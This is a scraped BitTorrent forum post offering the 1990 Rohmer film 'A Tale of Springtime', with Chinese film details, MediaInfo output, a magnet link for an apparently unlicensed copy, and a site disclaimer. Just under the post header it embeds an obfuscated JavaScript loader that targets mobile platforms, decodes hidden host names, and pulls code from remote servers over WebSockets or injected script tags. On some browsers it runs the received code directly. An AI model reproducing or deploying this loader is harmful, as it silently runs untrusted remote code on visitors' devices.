春天的故事[简繁字幕].A.Tale.of.Springtime.1990.1080p.FriDay.WEB-DL.H264.AAC 2.98GB

版主小s 1月前 195

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 春天的故事 / 人间四季:春 / A Tale of Springtime
◎片  名 Conte de printemps
◎年  代 1990
◎产  地 法国
◎类  别 剧情 / 喜剧 / 爱情
◎语  言 法语
◎上映日期 1990-04-04
◎IMDb链接 https://www.imdb.com/title/tt0097106/
◎豆瓣评分 8.4/10 (35279人评价)
◎豆瓣链接 https://movie.douban.com/subject/1293632/
◎片  长 108 分钟
◎导  演 埃里克·侯麦 éric Rohmer (id:1054406)
◎编  剧 埃里克·侯麦 éric Rohmer (id:1054406)
◎演  员 休格·奎斯特 Hugues Quester (id:1025604)
       露易丝.贝内特 Elo?se Bennett (id:1352910)
       安娜·特塞德雷 Anne Teyssèdre (id:1352909)
       弗洛朗丝·达雷尔  Florence Darel (id:1281823)
       索菲.罗宾 Sophie Robin (id:1352911)
       玛格丽特·梅内格 Margaret Ménégoz (id:1292841)
       亚历山大·萨洛 Alexandre Tharaud (id:1325924)
       Luc Pagès Luc Pagès (id:1293811)

◎标  签 法国 / 侯麦 / 法国电影 / 埃里克·侯麦 / 文艺 / 爱情 / 春天的故事 / 1990

◎简  介
  珍妮(Anne Teyssèdre 饰)是一名哲学老师,一日在宴会上,她与娜塔莎(Florence Dare 饰)相识,也许是因为寂寞,两个本无交集的人成为了朋友。娜塔莎邀请珍妮到自己家里做客,后者欣然前往。娜塔莎有一个奇怪的家庭,父亲离婚,交往了一个年龄和自己相差无几的漂亮女朋友伊芙(Elo?se Bennett 饰),这一点令娜塔莎无法接受,同时,一条项链的失踪也加深了她与“后妈”的隔阂。珍妮的介入让这个家庭里的关系发生了改变,娜塔莎的父亲显然对知性的珍妮抱有好感,而娜塔莎也渴望能和喜欢的珍妮组成新的家庭。                                       
                                    对于娜塔莎的热情撮合,珍妮显得有些被动,她坚持听从自己内心的感情,不愿掺和到这个复杂的家庭中去。一次四人的乡村度假中,酝酿已久的矛盾终于激发了,娜塔莎同伊芙发生了争吵,而她吃惊的发现自己一直信任的珍妮居然站在敌人的那一边。她该怎么办?在这个春...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 262401002332136265305764181631424142756 (0xC5689843B0A8EB5E3C8AE71BE6AE1DA4)

  4. Complete name                            : [email protected]DDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 2.98 GiB

  8. Duration                                 : 1 h 47 min

  9. Overall bit rate                         : 3 979 kb/s

  10. Encoded date                             : UTC 2021-08-11 05:14:19

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 1 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 1 frame

  21. Format settings, GOP                     : M=1, N=60

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 47 min

  24. Bit rate mode                            : Constant

  25. Bit rate                                 : 4 000 kb/s

  26. Width                                    : 1 920 pixels

  27. Height                                   : 1 080 pixels

  28. Display aspect ratio                     : 16:9

  29. Frame rate mode                          : Constant

  30. Frame rate                               : 29.970 (30000/1001/53354) FPS

  31. Color space                              : YUV

  32. Chroma subsampling                       : 4:2:0

  33. Bit depth                                : 8 bits

  34. Scan type                                : Progressive

  35. Bits/(Pixel*Frame)                       : 0.064

  36. Stream size                              : 2.88 GiB (97%)

  37. Language                                 : English

  38. Default                                  : Yes

  39. Forced                                   : No


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 47 min

  46. Bit rate                                 : 125 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 46.875 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 96.1 MiB (3%)

  53. Language                                 : French

  54. Default                                  : Yes

  55. Forced                                   : No


  56. Text #1

  57. ID                                       : 3

  58. Format                                   : UTF-8

  59. Codec ID                                 : S_TEXT/UTF8

  60. Codec ID/Info                            : UTF-8 Plain Text

  61. Duration                                 : 1 h 44 min

  62. Bit rate                                 : 62 b/s

  63. Count of elements                        : 1801

  64. Stream size                              : 47.9 KiB (0%)

  65. Title                                    : Chinese Simplified

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : UTF-8

  72. Codec ID                                 : S_TEXT/UTF8

  73. Codec ID/Info                            : UTF-8 Plain Text

  74. Duration                                 : 1 h 44 min

  75. Bit rate                                 : 62 b/s

  76. Count of elements                        : 1801

  77. Stream size                              : 47.9 KiB (0%)

  78. Title                                    : Chinese Traditional

  79. Language                                 : Chinese

  80. Default                                  : No

  81. Forced                                   : No



TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:2778C078E4B11E4B505C8C9C32ADE665612E2474
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回